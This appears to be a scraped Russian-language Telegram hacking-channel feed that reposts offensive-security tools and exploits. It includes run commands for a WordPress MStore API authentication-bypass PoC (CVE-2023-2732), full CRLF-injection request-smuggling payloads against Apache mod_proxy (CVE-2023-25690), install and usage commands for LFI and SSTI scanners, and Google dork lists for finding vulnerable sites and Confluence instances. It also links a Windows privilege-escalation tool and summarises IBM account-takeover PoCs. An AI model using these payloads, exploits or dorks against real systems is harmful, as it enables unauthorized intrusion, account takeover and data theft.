❤8🔥5👍2🐳1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Что тут у нас? Ой, очередное LPE😁
https://github.com/Dec0ne/DavRelayUp
#ad #redteam #pentest #lpe
https://github.com/Dec0ne/DavRelayUp
DavRelayUp - a universal no-fix LPE in domain-joined windows workstations where LDAP signing is not enforced (the default settings).
#ad #redteam #pentest #lpe
MStore API <= 3.9.2 - Authentication Bypass
CVE-2023-2732
Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.
PoC:
CVE-2023-2732
Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.
PoC:
git clone https://github.com/RandomRobbieBF/CVE-2023-2732 ; pip3 install -r requirements.txt ; python3 mstore-api.py -u http://TARGET#CVE #POC
🆒3
Forwarded from Monkey Hacker
Apache HTTP-Request-Smuggling (CVE-2023-25690)
Где-то в апреле была шумиха с новой вулной в Apache, когда
В первом случае был следующий прикол
Пользователь запрашивает URL
Весело, да?
Плюс, замечу, что Apache был уязвим еще к
Для его эксплуатации мы уже имеем следующиим запрос
И теперь делаем смагглинг запрос
И ответ будет следующий
Где-то в апреле была шумиха с новой вулной в Apache, когда
mod_proxy вместе с правилами RewriteRule и ProxyPassMatch, приводил к HTTP-Request-SmugglingВ первом случае был следующий прикол
Пользователь запрашивает URL
https://testik.com/categories/1, а RewriteRule сопоставляет URL и захватывает значение 1 с помощью регулярного выражения ^/categories/(.*). Затем правило переписывает URL на http://testik.com:8080/categories?id=1, добавляя перехваченное значение к переписанному URL в качестве id параметра запроса.ProxyPassReverse, уже просто заменяет домен и адрес внутреннего сервера на домен и адрес прокси-сервера, чтобы клиент мог правильно переходить по ссылкам и получать доступ к контенту с проксированного внутреннего сервера /categories/ http://example-shop.com:8080/. Плюс, замечу, что Apache был уязвим еще к
CRLF-injection, который нам будет нужен в дальнейшемДля его эксплуатации мы уже имеем следующиим запрос
GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1
Host: localhostИ теперь делаем смагглинг запрос
GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1
Host: localhostИ ответ будет следующий
GET /categories.php?id=1 HTTP/1.1
Host: localhost
GET /SMUGGLED HTTP/1.1
Host: backendGitHub
GitHub - dhmosfunk/CVE-2023-25690-POC: CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server…
CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability. - dhmosfunk/CVE-2023-25690-POC
PortSwigger Labs ERR_TIMED_OUT in Burp Suite browser
Если вы сталкивались с проблемой, когда лабы с PortSwigger не открываются в браузере BurpSuite. То вот решение:
1. Открываем браузер и переходим на
3. Нажимаем Relaunch
4. Готово! Продуктивного похека 😎
5. Делимся этой шпорой
#полезное
Если вы сталкивались с проблемой, когда лабы с PortSwigger не открываются в браузере BurpSuite. То вот решение:
1. Открываем браузер и переходим на
chrome://flags
2. Далее в поиске пишем Encrypted ClientHello и ставим значение Disabled3. Нажимаем Relaunch
4. Готово! Продуктивного похека 😎
❤5
🔴Lfi-Space - LFI Scan Tool
Установка:
Установка:
git clone https://github.com/capture0x/Lfi-Space/ ; cd Lfi-Space ; pip3 install -r requirements.txtИспользование:
python3 lfi.pyGoogle Dorks'и для поиска LFI:
inurl:/filedown.php?file=#tools
inurl:/news.php?include=
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
inurl:/squirrelcart/cart_content.php?cart_isp_root=
inurl:index2.php?to=
inurl:index.php?load=
inurl:home.php?pagina=
/surveys/survey.inc.php?path=
index.php?body=
/classes/adodbt/sql.php?classes_dir=
enc/content.php?Home_Path=
🔥3👏1
SSTI FINDER TOOL
SSTI Finder предназначен для обнаружения и идентификации уязвимостей Server-Side Template Injection (SSTI) в веб-приложениях. Уязвимости SSTI возникают, когда управляемый пользователем ввод прямо или косвенно включается в шаблоны на стороне сервера, что позволяет злоумышленнику выполнить произвольный код на сервере.
Установка:
SSTI Finder предназначен для обнаружения и идентификации уязвимостей Server-Side Template Injection (SSTI) в веб-приложениях. Уязвимости SSTI возникают, когда управляемый пользователем ввод прямо или косвенно включается в шаблоны на стороне сервера, что позволяет злоумышленнику выполнить произвольный код на сервере.
Установка:
git clone https://github.com/capture0x/SSTI-FINDER/ ; cd SSTI-FINDER ; bash setup.sh ; pip3 install -r requirements.txt ; chmod -R 755 ssti.pyИспользование:
python3 ssti.py
Google Dorks'и для поиска SSTI:inurl:https://confluence. login.action#tools
inurl:https://wiki.*.com/confluence/
allinurl: /confluence/login.action?
“/spacedirectory/view.action”
“/pages/viewpage.action?”
“/pages/releaseview.action?”
“aboutconfluencepage.action”
🔥6🆒1
Forwarded from SHADOW:Group
Исследователь не поленился и записал три PoC'а для уязвимостей, найденных на одном из сервисов IBM.
1. IDOR в API, приводящий к извлечению личных данных и паролей всех пользователей.
2. Повышение привилегий до администратора через изменение роли.
3. Манипулирование запросом приводящее к обходу регистрации в панели сотрудников и манипулирование ответом приводящее к захвату учетной записи.
#web #ato #idor #privesc
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3